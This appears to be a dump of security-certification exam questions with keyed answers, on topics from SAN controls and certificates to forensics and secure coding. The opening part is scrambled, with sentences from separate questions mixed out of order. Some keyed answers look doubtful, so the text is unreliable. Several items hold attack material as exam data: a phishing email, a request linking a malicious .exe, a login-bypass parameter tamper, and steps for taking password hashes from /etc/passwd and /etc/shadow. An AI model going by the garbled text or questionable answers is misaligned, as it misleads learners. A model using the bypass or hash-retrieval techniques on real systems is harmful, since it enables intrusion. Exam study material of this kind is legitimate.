www. Users have reported that the website is not functioning correctly.2. Improper error handling prevented the application from recovering. Enable STARTTLS on the spam filter.examplesite.168. E.com ________________________________ Additional information: The authorized mail servers IPs are 192.Received: by smtpex. The front-facing web server offers an HTML form. Disable open relay functionality. Improper error handling prevented the application from recovering. Therefore. The network's subnet is 192. Mon. which asks for a user's age. The age variable stored the large number and filled up disk space which stopped the application from continuing to function. Mon.com> To: "customer@example. B. C. Improper error handling prevented the application from recovering. This input gets placed into a signed integer variable and is then checked to ensure that the user is in the adult age range.168.2.example. 01 Nov 2010 13:15:14 -0500 Received: from 172. Block port 25 on the firewall for all unauthorized mail servers.18. B.10 and 192. D. Shut down the SMTP service on the unauthorized mail server.0/25. The age variable has had an integer overflow and was assigned a very small negative number which led to unpredictable application behavior. A.2. the website issues are not related to the large number being input. Computers are able to store numbers well above "billions" in size.168. Which of the following is the MOST likely situation that has occurred? A. D.2. C. Correct Answer: B Section: Mixed Questions . The application has crashed because a very large integer has lead to a "divide by zero".com> Date: Mon. The web developer has inspected log files and sees that a very large number (in the billions) was submitted just before the issue started occurring.45. 1 Nov 2010 13:15:11 -0500 Subject: New Insurance Application Thread-Topic: New Insurance Application Please download and install software from the site below to maintain full access to your account.122 by 192.com" <customer@example. Correct Answer: BD Section: Mixed Questions Explanation Explanation/Reference: QUESTION 117 A web developer is responsible for a simple web application that books holiday accommodations.55.168.com (SMTP READY) with ESMTP (AIO).11. Identify the origination point for malicious activity on the unauthorized mail server. Which of the following are the MOST appropriate courses of action a security administrator could take to eliminate this risk? (Select TWO). 1 Nov 2010 13:15:14 -0500 From: Company <IT@Company.

Identify the gaps between the two tests.merger. and policy/awareness perspective. Correct Answer: D Section: Mixed Questions Explanation Explanation/Reference: QUESTION 119 It has come to the IT administrator's attention that the "post your comment" field on the company blog page has been exploited. resulting in cross-site scripting attacks against customers reading the blog. This needs to be handled by legal representatives well versed in corporate law. which of the following BEST provides the procedure that the consultant should follow? A. Which of the following is the MOST appropriate? A. Perform client side input validation Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 120 A business unit of a large enterprise has outsourced the hosting and development of a new external website which will be accessed by premium customers. assess what the security gaps will be from a physical. B.Explanation Explanation/Reference: QUESTION 118 A company has decided to change its current business direction and refocus on core business. D. Filter metacharacters C. Identify the current state from a security viewpoint. Update the blog page to HTTPS B. Based on the demerger. Consequently. A security consultant has been engaged to advise on residual information security concerns with a de. in order to speed up the time to market timeline. Perform another penetration test after the de-merger. From a high-level perspective. Which of the following would be the MOST effective at preventing the "post your comment" field from being exploited? A. Perform a penetration test for the current state of the company. Install HIDS on the server D. Duplicate security-based assets should be sold off for commercial gain to ensure that the security posture of the company does not decline. DR. Explain that security consultants are not trained to offer advice on company acquisitions or demergers. C. several company sub-businesses are in the process of being sold-off. Patch the web application E. technical. The external party providing the hosting and website development should be obligated under contract to provide a secure service which is regularly tested (vulnerability .

The use of external organizations to provide hosting and web development services is not recommended as the costs are typically higher than what can be achieved internally. Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 121 An administrator is tasked with securing several website domains on a web server. D. 3 D. mail.example.000 after the first year. 4 Correct Answer: D Section: Mixed Questions Explanation . An SLA should be in place for the resolution of newly identified vulnerabilities and penetration / vulnerability testing should be conducted regularly. B. An MOU should be in place for the resolution of newly identified vulnerabilities and penetration / vulnerability testing should be conducted regularly. Outsourcing transfers all the risk to the third party. C. However. and www. Which of the following would allow the administrator to secure those domains with a single issued certificate? A. thereby minimizing the cost and any legal obligations. 1 B. compliance with privacy regulations becomes more complex and guaranteed uptimes are difficult to track and measure.000 and a yearly maintenance of $2.org.example.000 in revenue per month and be more secure. How many years until there is a return on investment for this new package? A. The legacy product generates $10. and penetration). SLAs should be in place for the resolution of newly identified vulnerabilities and a guaranteed uptime. archive.000 in revenue a month. The administrator elects to secure www. Wildcard Certificate C. Outsourcing transfers the risk to the third party. Intermediate Root Certificate B. The new software product has an initial cost of $180. 2 C. it will generate $15.example. In addition.example.org with the same certificate. Subject Alternative Names Certificate Correct Answer: D Section: Mixed Questions Explanation Explanation/Reference: QUESTION 122 An administrator wishes to replace a legacy clinical software product as it has become a security risk. EV x509 Certificate D.com.com.

Explanation/Reference: QUESTION 123 A large company is preparing to merge with a smaller company. Require Company ABC employees to use two-factor authentication on the required systems D. An ROI calculation should be performed to determine which company's application should be used. Which of the following BEST prevents Company XYZ representatives from gaining access to unauthorized Company ABC systems? A. Which of the following actions should the large company's security administrator take in preparation for the merger? A. The smaller company has been very profitable. Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 124 Which of the following technologies prevents an unauthorized HBA from viewing iSCSI target information? A. Require each Company XYZ employee to use an IPSec connection to the required systems B. D.existence. but the smaller company's main applications were created in-house. C. Data snapshots C. A regression test should be performed on the in-house software to determine security risks associated with the software. B. Require a site-to-site VPN for intercompany communications Correct Answer: B . The representatives reside at Company XYZ's headquarters. LUN masking D. Deduplication B. A security assessment should be performed to establish the risks of integration or co. A review of the mitigations implemented from the most recent audit findings of the smaller company should be performed. Require Company XYZ employees to establish an encrypted VDI session to the required systems C. Storage multipaths Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 125 Company ABC is hiring customer service representatives from Company XYZ.

and 1 full time employee to respond to incidents per year. correlators. Internal employee costs are averaged to be $80. Based on calculating TCO of the two vendor proposals over a 5 year period. Operational expenses for the pharmaceutical company to partner with the vendor are expected to be a 0. having an outsourced solution appears to be more expensive. having an outsourced solution appears cheaper. B. Vendor B: managed service-based solution which can be the outsourcer for the pharmaceutical company's needs. which of the following options is MOST accurate? A. C.000 per year.Section: Mixed Questions Explanation Explanation/Reference: QUESTION 126 A Chief Information Security Officer (CISO) has requested that a SIEM solution be implemented. The web server was not multipathed. B. D.5 full time employee (FTE) to manage the solution. Based on cost alone. causing a costly downtime on the company's primary website. Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: .000. The SAN snapshots were not up-to-date. Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 127 A port in a fibre channel switch failed. Operational expenses are expected to be a 0. Which of the following is the MOST likely cause of the downtime? A. having a purchased product solution appears cheaper. C. D.5 FTE per year. The web server iSCSI initiator was down. Based on cost alone. Two vendor proposals have been received: Vendor A: product-based solution which can be purchased by the pharmaceutical company. The CISO wants to know upfront what the projected TCO would be before looking further into this concern. Based on cost alone. storage and management consoles expected to be $150. Based on cost alone. both outsourced an in-sourced solutions appear to be the same. Capital expenses to cover central log collectors.000 per year per FTE. Bundled offering expected to be $100. The SAN replication to the backup site failed.

Which of the following are true statements? (Select TWO). The X509 V3 certificate is expired. Agile development is more secure than Waterfall as it is a more modern methodology which has the advantage of having been able to incorporate security best practices of recent years. C. A. The client-server implements client-server mutual authentication with different certificates. Data de-duplication D. However. B. Agile development is fundamentally less secure than Waterfall due to the lack of formal up. this has been viewed as a successful initiative by the stakeholders as it has improved time-to-market. Correct Answer: D Section: Mixed Questions Explanation Explanation/Reference: QUESTION 129 A vulnerability scanner report shows that a client-server host monitoring solution operating in the credit card corporate environment is managing SSL sessions with a weak algorithm which does not meet corporate policy. B. A. Which of the following is the MOST accurate statement? A. Agile development has different phases and timings compared to Waterfall. The X509 V3 certificate was issued by a non trusted public CA. Overall. Correct Answer: BC Section: Mixed Questions Explanation Explanation/Reference: QUESTION 130 Which of the following represents important technical controls for securing a SAN storage infrastructure? (Select TWO). some staff within the security team have contended that Agile development is not secure. Port scanning . D. Storage pool space allocation E. The client-server handshake is configured with a wrong priority. C. Agile and Waterfall approaches have the same effective level of security posture. RAID configuration C. Synchronous copy of data B. Security activities need to be adapted and performed within relevant Agile phases.QUESTION 128 An internal development team has migrated away from Waterfall development to use Agile development. They both need similar amounts of security effort at the same phases of development. E. The client-server handshake is based on TLS authentication. The client-server handshake could not negotiate strong ciphers.front design and inability to perform security reviews. F. D.

Implementing 802. Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 133 Joe is a security architect who is tasked with choosing a new NIPS platform that has the ability to perform SSL inspection. the security architect wants to outsource identity proofing and second factor digital delivery to the third party. While reviewing the data collected by the protocol analyzer. C. can be centrally .F. Which of the following solutions will address the enterprise requirements? A. LUN masking/mapping G. Implementing federated network access with the third party. Using a HSM at the network perimeter to handle network device access. Full disk encryption should be enabled across the enterprise to ensure the confidentiality of sensitive data. Database record encryption should be used when storing sensitive information on virtual servers. C. In order to reduce costs and administrative overhead. D. A separate physical interface placed on a private VLAN should be configured for live host operations. D. the security administrator notices that sensitive data is present in the packet capture. Port mapping Correct Answer: FG Section: Mixed Questions Explanation Explanation/Reference: QUESTION 131 An enterprise must ensure that all devices that connect to its networks have been previously approved. The solution must support dual factor mutual authentication with strong identity assurance. Which of the following should the security administrator recommend to ensure the confidentiality of sensitive information during live VM migration. analyze up to 10Gbps of traffic. while minimizing latency issues? A. Correct Answer: D Section: Mixed Questions Explanation Explanation/Reference: QUESTION 132 A security administrator is performing VDI traffic data collection on a virtual server which migrates from one host to another. B. Sensitive data should be stored on a backend SAN which uses an isolated fiber channel network. Using a VPN concentrator which supports dual factor via hardware tokens. B.1x with EAP-TTLS across the infrastructure.

com/badcontent/exploitme. BYOD and cloud storage prior to purchasing the product. "marketingCookieTracker":"JSESSIONID=000000001" "returnCode":"Account added successfully" } Which of the following are security weaknesses in this example? (Select TWO).exe"} ]. Test the product and make a product recommendation. interview existing customers of the product and then recommend that the product be purchased. Contribute to an RFP and then evaluate RFP responses to ensure that the vendor product meets all mandatory requirements. Ensure that the NIPS platform can also deal with recent technological advancements. Research new technology vendors to look for potential products.managed and only reveals inspected application payload data to specified internal security employees.1 200 OK { "newAccountDetails": [ { "cardNumber":"1234123412341234"} { "cardExpiry":"2020-12-31"} { "cardCVV":"909"} ].example. . B. "customer": [ { "name":"Joe Citizen"} { "custRef":"3153151"} ] } The banking website responds with: HTTP/1. such as threats emerging from social media. Research industry surveys. Choose a popular NIPS product and then consider outsourcing the ongoing device management to a cloud provider. Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 134 A penetration tester is inspecting traffic on a new mobile banking application and sends the following web request: POST http://www.com/resources/NewBankAccount HTTP/1. D. Which of the following steps should Joe take to reach the desired outcome? A.example. Evaluate relevant RFC and ISO standards to choose an appropriate vendor product. Consider outsourcing the product evaluation and ongoing management to an outsourced provider on the basis that each of the requirements are met and a lower total cost of ownership (TCO) is achieved. E. Give access to internal security employees so that they can inspect the application payload data. C.1 Content-type: application/json { "account": [ { "creditAccount":"Credit Card Rewards account"} { "salesLeadRef":"www.

She has intercepted the following HTTP request: POST /login. Attempt to brute force all usernames and passwords using a password cracker . Reconnaissance tools C. A. HTTP interceptor E. Password cracker Correct Answer: DE Section: Mixed Questions Explanation Explanation/Reference: QUESTION 136 Ann is testing the robustness of a marketing website through an intercepting proxy.aspx from POST to GET B. Vulnerable to malware file uploads F.aspx HTTP/1. Vulnerability scanner F.1 Host: comptia. Network enumerator D. is tasked with testing the security robustness of the protocol between a mobile web application and a RESTful application server. Missing input validation on some fields B.A.org Content-type: text/html txtUsername=ann&txtPassword=ann&alreadyLoggedIn=false&submit=true Which of the following should Ann perform to test whether the website is susceptible to a simple authentication bypass? A. Jailbroken mobile device B. Vulnerable to XSS E. Sensitive details communicated in clear-text D. Which of the following security tools would be required to assess the security between the mobile web application and the RESTful application server? (Select TWO). Vulnerable to SQL injection C. a penetration tester. Remove all of the post data and change the request to /login. JSON/REST is not as secure as XML Correct Answer: AC Section: Mixed Questions Explanation Explanation/Reference: QUESTION 135 Joe.

C. Ensure hypervisor layer firewalling between all VM hosts regardless of security zone. C. A. A security design is performed at the end of the requirements phase Correct Answer: AD Section: Mixed Questions Explanation Explanation/Reference: QUESTION 138 ABC Corporation uses multiple security zones to protect systems and information. D. Organize VM hosts into containers based on security zone and restrict access using an ACL. Remove the txtUsername and txtPassword post data and toggle submit from true to false Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 137 An organization has implemented an Agile development process for front end web application development. For each major iteration penetration testing is performed E. Remove the txtPassword post data and change alreadyLoggedIn from false to true D. Daily stand-up meetings are held to ensure security requirements are understood D. Each zone has different VM administrators. Security standards and training is performed as part of the project C. Maintain a separate virtual switch for each security zone and ensure VM hosts bind to only the correct virtual NIC(s). B. Which of the following activities MUST be mandated to ensure code quality from a security perspective? (Select TWO). and all of the VM hosts are part of a consolidated VM infrastructure. Security requirements are story boarded and make it into the build F. Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: . A new security architect has just joined the company and wants to integrate security activities into the SDLC. Which of the following restricts different zone administrators from directly accessing the console of a VM host from another zone? A. Require multi-factor authentication when accessing the console at the physical VM host. Static and dynamic analysis is run as part of integration B.

Establish a list of users that must work with each regulation B. Use RC4 with Fixed IV generation D. Establish a company framework F. Which of the following would BEST allow the organization to achieve compliance and ensure security? (Select THREE). Use AES in Electronic Codebook mode B. Brute force attack . The application designers have asked that the algorithm support the transport encryption with the lowest possible performance overhead. Use AES in Counter mode Correct Answer: EF Section: Mixed Questions Explanation Explanation/Reference: QUESTION 140 ABC Company must achieve compliance for PCI and SOX. Online password testing B. A. A. Dictionary attack D. Apply technical controls to meet compliance with the regulation Correct Answer: BDF Section: Mixed Questions Explanation Explanation/Reference: QUESTION 141 A pentester must attempt to crack passwords on a windows domain that enforces strong complex passwords. Use AES with cipher text padding E. Establish a list of devices that must meet each regulation C. Centralize management of all devices on the network D. Compartmentalize the network E. Rainbow tables attack C. Which of the following recommendations would BEST meet the needs of the application designers? (Select TWO). Which of the following would crack the MOST passwords in the shortest time period? A. Use RC4 with a nonce generated IV F. Use RC4 in Cipher Block Chaining mode C. The application utilizes streaming video that can be viewed both on computers and mobile devices.QUESTION 139 A security administrator has been asked to select a cryptographic algorithm to meet the criteria of a new application.

D. Create a custom standard to define the data. and phone numbers.Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 142 A security analyst. Law enforcement has requested that the user continue to operate on the network as normal. Implement a de facto corporate standard for all analyzed data. Use well formed standard compliant XML and strict schemas. The security administrator instead suggests that the developers: A. However. B. as well as occasional chunks of data in unpredictable formats. Additionally. The developers want to construct a new data format and create custom tools to parse and process the data. Only document the data format in the parsing application code. Which of the following is evidence that would aid Ann in making a case to management that action needs to be taken to safeguard these servers? A. Ann. Which of the following will BEST meet the goals of law enforcement? . Provide a report of all the IP addresses that are connecting to the systems and their locations B. states that she believes Internet facing file transfer servers are being attacked. Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 144 A user is suspected of engaging in potentially illegal activities. The systems must exchange large amounts of fixed format data such as names. Provide a report showing the file transfer logs of the servers D. Establish alerts at a certain threshold to notify the analyst of high activity C. Compare the current activity to the baseline of normal activity Correct Answer: D Section: Mixed Questions Explanation Explanation/Reference: QUESTION 143 A recently hired security administrator is advising developers about the secure integration of a legacy in-house application with a new cloud based processing system. addresses. the law enforcement agency has requested that the user's ongoing communication be retained in the user's account for future investigations. they would like to have a copy of any communications from the user involving certain key terms. C.

Spending on SCADA security controls should stay steady. . and PC boot loader protection research should increase by 100%. Next. A. Perform an e-discover using the applicable search terms. A penetration tester must attempt to retrieve password hashes. Begin a chain-of-custody on for the user's communication. Over the same time period. /etc/password E. B. the growth in the number of PC boot loader attacks has grown exponentially. application control spending should increase substantially and spending on PC boot loader controls should increase substantially. back up the user's email for a future investigation. /etc/shadow C. /etc/passwd B. and spending on PC boot loader protections should remain steady. Starting two years ago. Spending all controls should increase by 15% to start. Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 145 An administrator has enabled salting for users' passwords on a UNIX box. application control spending should increase slightly. Analysis of these trends would seem to suggest which of the following strategies should be employed? A. Next. application control spending should decrease slightly and spending on PC boot loader protections should increase substantially. place a legal hold on the user's email account. D. Next. Which of the following files must the penetration tester use to eventually obtain passwords on the system? (Select TWO). Perform a back up of the user's email account. B. Place a legal hold on the user's email account. the number of attacks against applications has decreased or stayed flat each year. /etc/security D. but that this year's growth has slowed to around 7%. Next. /bin/bash Correct Answer: AB Section: Mixed Questions Explanation Explanation/Reference: QUESTION 146 The latest independent research shows that cyber attacks involving SCADA systems grew an average of 15% per year in each of the last four years.A. spending on application controls should be suspended. C. Spending on SCADA security controls should increase by 15%. /sbin/logon F. Spending on SCADA protections should stay steady. perform e-discovery searches to collect applicable emails. C. the incidence of PC boot loader or BIOS based attacks was negligible. export the applicable emails that match the search terms. At the start of the measure period. D.

The patch management system is causing the devices to be noncompliant after issuing the latest patches. Verify the MD5 checksum of system binaries. C. F. D. B. The audit discovers that 40 percent of the desktops do not meet requirements. the company is audited for compliance to regulations. Which of the following is the MOST likely cause of the noncompliance? A. 40 percent of the devices use full disk encryption. Check log files for logins from unauthorized IPs. The devices are being modified and settings are being overridden in production. D. E. C. Use gpg to encrypt compromised data files. Check /proc/kmem for fragmented memory segments. Use vmstat to look for excessive disk I/O. The desktop applications were configured with the default username and password. Check for unencrypted passwords in /etc/shadow. Six months later. Correct Answer: ADG Section: Mixed Questions Explanation Explanation/Reference: QUESTION 148 During a new desktop refresh. G. Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 149 A company that must comply with regulations is searching for a laptop encryption product to use for its 40. Check timestamps for files modified around time of compromise. all hosts are hardened at the OS level before deployment to comply with policy.000 end points.Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 147 Which of the following would be used in forensic analysis of a compromised Linux system? (Select THREE). A. H. Use lsof to determine files with future timestamps. B. The product must meet regulations but also be .

The CEO highlighted that code base confidentiality is of critical importance to allow the company to exceed the competition in terms of the product's reliability. Which of the following implementations would BEST meet the needs? A. D. Sign a MOU with a marketing firm to preserve the company reputation and use in-house resources for random testing. B. Sign a NDA with a large security consulting firm and use the firm to perform Grey box testing and address all findings. Correct Answer: C . Commercially available software packages are often widely available.flexible enough to minimize overhead and support in regards to password resets and lockouts. A container-based encryption product that allows the end users to select which files to encrypt C. Which of the following is the BEST description of why this is true? A. Information concerning vulnerabilities is often ignored by business managers. and performance. C. B. Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 151 A firm's Chief Executive Officer (CEO) is concerned that IT staff lacks the knowledge to identify complex vulnerabilities that may exist in a payment system being internally developed. A partition-based software encryption product with a low-level boot protection and authentication B. Commercially available software packages are typically well known and widely available. The payment system being developed will be sold to a number of organizations and is in direct competition with another leading product. Information concerning vulnerabilities and viable attack patterns are never revealed by the developer to avoid lawsuits. Commercially available software packages are not widespread and are only available in limited areas. D. Commercially available software packages are well known and widely available. Information concerning vulnerabilities and viable attack patterns are always shared within the IT community. Which of the following would provide the MOST thorough testing and satisfy the CEO's requirements? A. Sign a BPA with a small software consulting firm and use the firm to perform Black box testing and address all findings. Information concerning vulnerabilities is often kept internal to the company that developed the software. A file-based encryption product using profiles to target areas on the file system to encrypt Correct Answer: D Section: Mixed Questions Explanation Explanation/Reference: QUESTION 150 A company decides to purchase commercially available software packages. Use the most qualified and senior developers on the project to perform a variety of White box testing and code reviews. A full-disk hardware-based encryption product with a low-level boot protection and authentication D. C. This can introduce new security risks to the network. stability.

The company implements a fully virtualized datacenter and terminal server access with two-factor authentication for customer access to the administrative website. D. Which of the following has MOST likely occurred? A.168.192.000 C.0/24 HR network 192. A hypervisor server was left un-patched and an attacker was able to use a resource exhaustion attack to gain unauthorized access. B.0/24 User network . $8.000 has an exposure factor of eight percent and an ARO of four.0/24 Datacenter 192.168. C.168.Section: Mixed Questions Explanation Explanation/Reference: QUESTION 152 A company provides on-demand cloud computing resources for a sensitive project.168.2. An employee with administrative access to the virtual guests was able to dump the guest memory onto a mapped disk. $2.11) VPN network 192.5.1. Which of the following figures is the system's SLE? A. $32.0/24 (FTP server is 192.000 D. Company B is not in the same industry as company A and the two are not competitors.5. Both VMs were left unsecured and an attacker was able to exploit network vulnerabilities to access each and move the data. Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 153 A system worth $100. Additional network information: DMZ network 192.0/24\ . The security administrator at the company has uncovered a breach in data confidentiality.168.000 B.3. $12. A stolen two factor token was used to move data from one virtual guest to another host on the same network segment.4.000 Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 154 VPN users cannot access the active FTP server through the router but can access any server in the data center.168. Sensitive data from customer A was found on a hidden directory within the VM of company B.

0/24 Permit 192.1.2. Add a permit statement to allow traffic from 192.0/24 192.168.2.168.1.5.168.3.1/32 192.5.168.3. IPS is blocking traffic and needs to be reconfigured D.0/24 192.0/24 Permit 192.168.1.4.0/24 Deny any any Which of the following solutions would allow the users to access the active FTP server? A.168.0/24 192.1.0/24 Permit 192.168.0/24 Permit 192.168.0/24 Deny 192.168.168.168.0/24 to the VPN network B.168. Increase bandwidth limit on the VPN network Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 155 Company policy requires that all company laptops meet the following baseline requirements: Software requirements: Antivirus Anti-malware Anti-spyware Log monitoring Full-disk encryption Terminal services enabled for RDP Administrative access for local users .1.Traffic shaper configuration: VLAN Bandwidth Limit (Mbps) VPN 50 User 175 HR 250 Finance 250 Guest 0 Router ACL: Action Source Destination Permit 192.0/24 192.168.0/24 192.168.1 from the VPN network C.168. Configure the traffic shaper to limit DMZ traffic E.1.5.168.1.1.4.0/24 192.5.0/24 Permit 192.0/24 192. Add a permit statement to allow traffic to 192.0/24 Deny 192.168.168.

2. Perform vulnerability scanning on a daily basis G. Which of the following hardening techniques should be applied to mitigate this specific issue from reoccurring? (Select TWO). Restrict VPN access for all mobile users C. a bootkit was discovered and it was trying to access external websites.81 3 packets Log 2: HTTP://www.743: %SEC-6-IPACCESSLOGS: list 10 denied 10.php? user=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa Log 3: Security Error Alert Event ID 50: The RDP protocol component X.encode ( req.getParameter("pwd") ) +" ` ". Vulnerabilities Buffer overflow SQL injection .company.encode ( req. a web developer. Restrict/disable TELNET access to network resources F. String query = "Select user_id FROM user_data WHERE user_name = ` " + oe.getParameter("userID") ) + " ` and user_password = ` " + oe.com/index. Group policy to limit web access B.5. reports performance issues with her laptop and is not able to access any network resources. Logs: Log 1: Feb 5 23:55:37.Hardware restrictions: Bluetooth disabled FireWire disabled WiFi adapter disabled Ann. Each log below was collected from various security devices compiled from a report through the company's security information and event management server.224 detected an error in the protocol stream and has disconnected the client Log 4: Encoder oe = new OracleEncoder (). After further investigation. Remove administrative access to local users E. A. Restrict/disable USB access Correct Answer: DG Section: Mixed Questions Explanation Explanation/Reference: QUESTION 156 A security manager looked at various logs while investigating a recent security breach in the data center from an external source. Remove full-disk encryption D.

ACL
XSS

Which of the following logs and vulnerabilities would MOST likely be related to the security breach? (Select TWO).

A. Log 1
B. Log 2
C. Log 3
D. Log 4
E. Buffer overflow
F. ACL
G. XSS
H. SQL injection

Correct Answer: BE
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 157
A storage as a service company implements both encryption at rest as well as encryption in transit of customers' data. The security administrator is concerned with the
overall security of the encrypted customer data stored by the company servers and wants the development team to implement a solution that will strengthen the
customer's encryption key. Which of the following, if implemented, will MOST increase the time an offline password attack against the customers' data would take?

A. key = NULL ; for (int i=0; i<5000; i++) { key = sha(key + password) }
B. password = NULL ; for (int i=0; i<10000; i++) { password = sha256(key) }
C. password = password + sha(password+salt) + aes256(password+salt)
D. key = aes128(sha256(password), password))

Correct Answer: A
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 158
After reviewing a company's NAS configuration and file system access logs, the auditor is advising the security administrator to implement additional security controls on
the NFS export. The security administrator decides to remove the no_root_squash directive from the export and add the nosuid directive. Which of the following is true
about the security controls implemented by the security administrator?

A. The newly implemented security controls are in place to ensure that NFS encryption can only be controlled by the root user.
B. Removing the no_root_squash directive grants the root user remote NFS read/write access to important files owned by root on the NAS.

C. Users with root access on remote NFS client computers can always use the SU command to modify other user's files on the NAS.
D. Adding the nosuid directive disables regular users from accessing files owned by the root user over NFS even after using the SU command.

Correct Answer: C
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 159
An IT auditor is reviewing the data classification for a sensitive system. The company has classified the data stored in the sensitive system according to the following
matrix:

DATA TYPE CONFIDENTIALITY INTEGRITY
AVAILABILITY
---------------------------------------------------------------------------------------------------------------- Financial HIGH HIGH LOW
Client name MEDIUM MEDIUM HIGH
Client address LOW MEDIUM LOW
----------------------------------------------------------------------------------------------------------------- AGGREGATE MEDIUM MEDIUM MEDIUM

The auditor is advising the company to review the aggregate score and submit it to senior management. Which of the following should be the revised aggregate score?

A. HIGH, MEDIUM, LOW
B. MEDIUM, MEDIUM, LOW
C. HIGH, HIGH, HIGH
D. MEDIUM, MEDIUM, MEDIUM

Correct Answer: C
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 160
A security auditor suspects two employees of having devised a scheme to steal money from the company. While one employee submits purchase orders for personal
items, the other employee approves these purchase orders. The auditor has contacted the human resources director with suggestions on how to detect such illegal
activities. Which of the following should the human resource director implement to identify the employees involved in these activities and reduce the risk of this activity
occurring in the future?

A. Background checks
B. Job rotation
C. Least privilege
D. Employee termination procedures

Correct Answer: B
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 161
During an incident involving the company main database, a team of forensics experts is hired to respond to the breach. The team is in charge of collecting forensics
evidence from the company's database server. Which of the following is the correct order in which the forensics team should engage?

A. Notify senior management, secure the scene, capture volatile storage, capture non-volatile storage, implement chain of custody, and analyze original media.
B. Take inventory, secure the scene, capture RAM, capture had drive, implement chain of custody, document, and analyze the data.
C. Implement chain of custody, take inventory, secure the scene, capture volatile and non- volatile storage, and document the findings.
D. Secure the scene, take inventory, capture volatile storage, capture non-volatile storage, document, and implement chain of custody.

Correct Answer: D
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 162
A security administrator has noticed that an increased number of employees' workstations are becoming infected with malware. The company deploys an enterprise
antivirus system as well as a web content filter, which blocks access to malicious web sites where malware files can be downloaded. Additionally, the company
implements technical measures to disable external storage. Which of the following is a technical control that the security administrator should implement next to reduce
malware infection?

A. Implement an Acceptable Use Policy which addresses malware downloads.
B. Deploy a network access control system with a persistent agent.
C. Enforce mandatory security awareness training for all employees and contractors.
D. Block cloud-based storage software on the company network.

Correct Answer: D
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 163
Company policy requires that all unsupported operating systems be removed from the network. The security administrator is using a combination of network based tools to
identify such systems for the purpose of disconnecting them from the network. Which of the following tools, or outputs from the tools in use, can be used to help the
security administrator make an approximate determination of the operating system in use on the local company network? (Select THREE).

A. Passive banner grabbing
B. Password cracker
C. http://www.company.org/documents_private/index.php? search=string#&topic=windows&tcp=packet
%20capture&cookie=wokdjwalkjcnie61lkasdf2aliser4
D. 443/tcp open http
E. dig host.company.com
F. 09:18:16.262743 IP (tos 0x0, ttl 64, id 9870, offset 0, flags [none], proto TCP (6), length 40) 192.168.1.3.1051 > 10.46.3.7.80: Flags [none], cksum 0x1800 (correct),
win 512, length 0
G. Nmap

Correct Answer: AFG
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 164
A new IT company has hired a security consultant to implement a remote access system, which will enable employees to telecommute from home using both company
issued as well as personal computing devices, including mobile devices. The company wants a flexible system to provide confidentiality and integrity for data in transit to
the company's internally developed application GUI. Company policy prohibits employees from having administrative rights to company issued devices. Which of the
following remote access solutions has the lowest technical complexity?

A. RDP server
B. Client-based VPN
C. IPSec
D. Jump box
E. SSL VPN

Correct Answer: A
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 165
The IT director has charged the company helpdesk with sanitizing fixed and removable media. The helpdesk manager has written a new procedure to be followed by the
helpdesk staff. This procedure includes the current standard to be used for data sanitization, as well as the location of physical degaussing tools. In which of the following
cases should the helpdesk staff use the new procedure? (Select THREE).

A. During asset disposal
B. While reviewing the risk assessment
C. While deploying new assets
D. Before asset repurposing

168. The administrator must disable the mobile IPv6 router flag G. The administrator must disable the IPv6 privacy extensions H.255 inet6 2001:200:5:922:1035:dfff:fee6:9dfe prefixlen 64 autoconf inet6 2001:200:5:922:10ab:5e21:aa9a:6393 prefixlen 64 autoconf temporary nd6 options=1<PERFORMNUD> media: autoselect status: active Given this output. The network implements 6to4 tunneling D. the security administrator has been unable to identify the users associated with certain devices utilizing IPv6 addresses.1.168. The routers implement NDP C.SIMPLEX. The administrator must disable IPv6 tunneling F.MULTICAST> mtu 1500 ether f8:1e:af:ab:10:a3 inet6 fw80::fa1e:dfff:fee6:9d8%en1 prefixlen 64 scopeid 0x5 inet 192. Which of the following types of authentication mechanisms does this statement describe? A. After the media has been disposed of F.14 netmask 0xffffff00 broadcast 192. When installing new printers H.E. When media fails or is unusable Correct Answer: ADH Section: Mixed Questions Explanation Explanation/Reference: QUESTION 166 Since the implementation of IPv6 on the company network. The router IPv6 advertisement has been disabled E. A.RUNNING. The administrator must disable DHCPv6 option code 1 Correct Answer: BG Section: Mixed Questions Explanation Explanation/Reference: QUESTION 167 ABC Corporation has introduced token-based authentication to system administrators due to the risk of password compromise.BROADCAST. which of the following protocols is in use by the company and what can the system administrator do to positively map users with IPv6 addresses in the future? (Select TWO). TOTP . The devices use EUI-64 format B.SMART.1. The tokens have a set of HMAC counter- based codes and are valid until they are used. During the data classification process G. en1: flags=8863<UP. even when the devices are centrally managed.

